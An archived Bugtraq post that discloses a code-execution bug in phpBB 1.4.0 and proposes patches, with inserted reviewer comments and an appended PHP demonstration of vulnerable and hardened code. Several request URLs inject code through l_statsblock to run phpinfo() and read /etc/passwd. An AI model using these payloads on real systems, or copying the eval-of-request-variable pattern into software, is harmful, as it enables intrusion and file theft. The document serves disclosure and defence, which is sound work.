Bugtraq mailing list archives

Re: phpBB 1.4.0 bug leads to easy admin privileges


From: "Joao Gouveia" <tharbad () kaotik org>
Date: Sat, 4 Aug 2001 20:10:18 +0100

Hi all,

This is regarding a phpBB security hole found some months ago.
Since this one came out, and the other (being a lot worse) didn't, I
thought it might have some interest.
This applies only to phpBB v1.4.0.

-----

----- Original Message -----
From: "UnderSpell" <underspell () accao net>
To: <james () phpbb com>
Sent: Thursday, May 17, 2001 12:15 PM
Subject: Security bug in phpBB




Hi there!

We've recently (actually not so recently) discovered a way to run any code
using phpBB.

The approach was very simple:
  At a given point you run an eval "eval($l_statsblock);".
  Since $l_statsblock is a language var we just have to find a way to set
us up with an invalid lang file:
after login, go to user prefs and

http://hacks.phpbb.com/phpBB/prefs.php?viewemail=1&savecookie=0&sig=0&smile=0&dishtml=0&disbbcode=0&themes=2&lang=THIS_IS_AN_INVALID_LANG_FILE&save=1&user=&submit=Gravar+Prefer%EAncias

By this time $l_statsblock is no longer initialized so we can do funny
stuff with them, like:
  http://hacks.phpbb.com/phpBB/prefs.php?l_statsblock=phpinfo();
or

http://hacks.phpbb.com/phpBB/prefs.php?teste=/etc/passwd&l_statsblock=include($teste);

and so on ... we only checked the phpinfo against the hack forum and the second
against my production and staging boards.

You have two ways to fix this:

1 ) Check if the lang file exists ( when it tries to include )

--- phpBB-1.4.0/auth.php        Wed Apr 25 05:47:59 2001
+++ phpBB/auth.php      Thu May 17 12:11:01 2001
@@ -273,16 +273,19 @@
  // Include the appropriate language file.
  if(!strstr($PHP_SELF, "admin"))
  {
-   include('language/lang_'.$default_lang.'.'.$phpEx);
+   $langfile = 'language/lang_'.$default_lang.'.'.$phpEx;
  }
  else
  {
     if(strstr($PHP_SELF, "topicadmin")) {
-     include('language/lang_'.$default_lang.'.'.$phpEx);
-       } else {
-     include('../language/lang_'.$default_lang.'.'.$phpEx);
-       }
+     $langfile ='language/lang_'.$default_lang.'.'.$phpEx;
+        } else {
+                $langfile = '../language/lang_'.$default_lang.'.'.$phpEx;
+        }
  }
+
+ if ( ! file_exists($langfile) ) { die("Invalid Language");}
+ else { include($langfile); }

  // See if translated pictures are available..
  $header_image = get_translated_file($header_image);
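Review bot: the added file_exists($langfile) check only confirms that some path exists; it does not address the root cause, which is the user-controlled $default_lang being spliced into the include path on the lines that build $langfile. Validate $default_lang against the installed language files (or a strict pattern such as ^[a-z_]+$) before building the path, and prefer is_file() over file_exists(), which is also true for directories. Consider falling back to the board's default language instead of die("Invalid Language"), which turns a bad preference into a denial of service for that account, and note that the replacement lines in the else branch use a different indentation (spaces) from the surrounding tab-indented code.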


2 ) Initialize $l_statsblock before trying to include ( preferred )

--- phpBB-1.4.0/auth.php        Wed Apr 25 05:47:59 2001
+++ phpBB/auth.php      Thu May 17 11:39:33 2001
@@ -269,6 +269,7 @@
  // set vars for all scripts
  $now_time = time();
  $last_visit = $temptime;
+$l_statsblock = '';

  // Include the appropriate language file.
  if(!strstr($PHP_SELF, "admin"))
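Review bot: initializing only $l_statsblock closes the eval() path this report describes, but every other variable the language file is supposed to define is left in the same state when the include fails, so while register_globals is on each of them can still be supplied from the request. Initialize the full set the language file is expected to provide (or include the board's default language first and let the user's choice override it), and combine this with validating $default_lang before the include rather than treating the two fixes as alternatives.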



  Credits for this should go to tharbad () kaotik org and
UnderSpell () accao net .

(A)UnderSpell


---


----- Original Message -----
From: <kill-9 () modernhackers com>
To: <bugtraq () securityfocus com>
Sent: Friday, August 03, 2001 8:51 PM
Subject: phpBB 1.4.0 bug leads to easy admin privileges


-New phpBB 1.4.x exploit
phpBB is an open source bulletin board created by the phpBB group.
Version 1.4.x of phpBB has a variable input validation problem that
can lead to limited arbitrary SQL queries, including gaining
administrative access to the board.
(...)


Best regards,

Joao Gouveia
--------------
tharbad () kaotik org
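The following is an added, self-contained illustration of the bug class in the forwarded report; it is not code from phpBB or from either poster. The core of the problem is an eval() of a variable that only a successfully include()d language file defines: when the language name in the user's preferences does not correspond to a file, the include fails, the variable stays unset, and PHP's register_globals (on by default in 2001) lets a query-string parameter of the same name supply it. The script emulates register_globals with extract() so it runs on current PHP, builds a throwaway language directory in the temp dir, and contrasts the vulnerable pattern with a hardened one that initializes the variables first, allow-lists the language against the installed files, and treats the stats block as a format string instead of code. The function names vuln_stats_block() and safe_stats_block(), the temp-directory layout, and the $l_statsblock_tpl variable are assumptions made for this example.

```php
<?php
// Added example, not phpBB code: reproduces the 1.4.0 pattern the report
// describes (eval() of a variable only a successfully include()d language
// file defines) and shows a hardened form.

// Constructed stand-in for phpBB's language/ directory (assumption).
$langDir = sys_get_temp_dir() . '/phpbb_lang_example_' . getmypid();
mkdir($langDir);
file_put_contents("$langDir/lang_english.php", <<<'PHP'
<?php
// 1.4.0 style: the stats block is a PHP code fragment meant for eval()
$l_statsblock = 'echo "Users online: " . $online . "\n";';
// safer style used by safe_stats_block(): a plain format string
$l_statsblock_tpl = "Users online: %d\n";
PHP);

// Vulnerable pattern. extract($request) stands in for register_globals,
// which turned every query-string parameter into a PHP variable.
function vuln_stats_block(array $request, string $langDir): string
{
    $lang = 'english';
    extract($request);                 // sets $lang AND $l_statsblock
    $online = 3;

    // As in auth.php: include whatever the preference names. An invalid
    // name fails silently, so nothing overwrites the attacker's value.
    @include "$langDir/lang_$lang.php";

    ob_start();
    eval($l_statsblock ?? '');         // request-controlled when include failed
    return ob_get_clean();
}

// Hardened pattern: initialize first, allow-list the language, no eval().
function safe_stats_block(array $request, string $langDir): string
{
    // 1. Everything the language file is expected to define gets a value
    //    before the include, so a failed include cannot leave it unset.
    $l_statsblock     = '';
    $l_statsblock_tpl = '';
    $online = 3;

    // 2. Accept only a language that is actually installed: enumerate
    //    lang_*.php instead of trusting the preference string.
    $installed = array_map(
        fn ($f) => substr(basename($f, '.php'), strlen('lang_')),
        glob("$langDir/lang_*.php")
    );
    $lang = $request['lang'] ?? 'english';
    if (!in_array($lang, $installed, true)) {
        $lang = 'english';             // fall back, don't die()
    }
    if (!is_file("$langDir/lang_$lang.php")) {
        return '';                     // no fallback installed either
    }
    include "$langDir/lang_$lang.php";

    // 3. The block is data, not code: a format string filled by sprintf().
    return sprintf($l_statsblock_tpl, $online);
}

// Demo: the request shape from the report, with phpinfo() swapped for a
// harmless marker. The hardened path never reads $request['l_statsblock'].
$attack = [
    'lang'         => 'THIS_IS_AN_INVALID_LANG_FILE',
    'l_statsblock' => 'echo "code from the query string ran\n";',
];
echo "vulnerable: " . vuln_stats_block($attack, $langDir);
echo "hardened:   " . safe_stats_block($attack, $langDir);

unlink("$langDir/lang_english.php");
rmdir($langDir);
```

Run with `php example.php`: the vulnerable call prints the attacker's marker, the hardened call prints "Users online: 3". The two fixes proposed in the report (existence check, pre-initialization) each remove one precondition; the allow-list plus initialization removes both, and replacing eval() with a format string removes the code-execution sink entirely, which matters because a language file is a data artifact that should never need to carry executable code.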



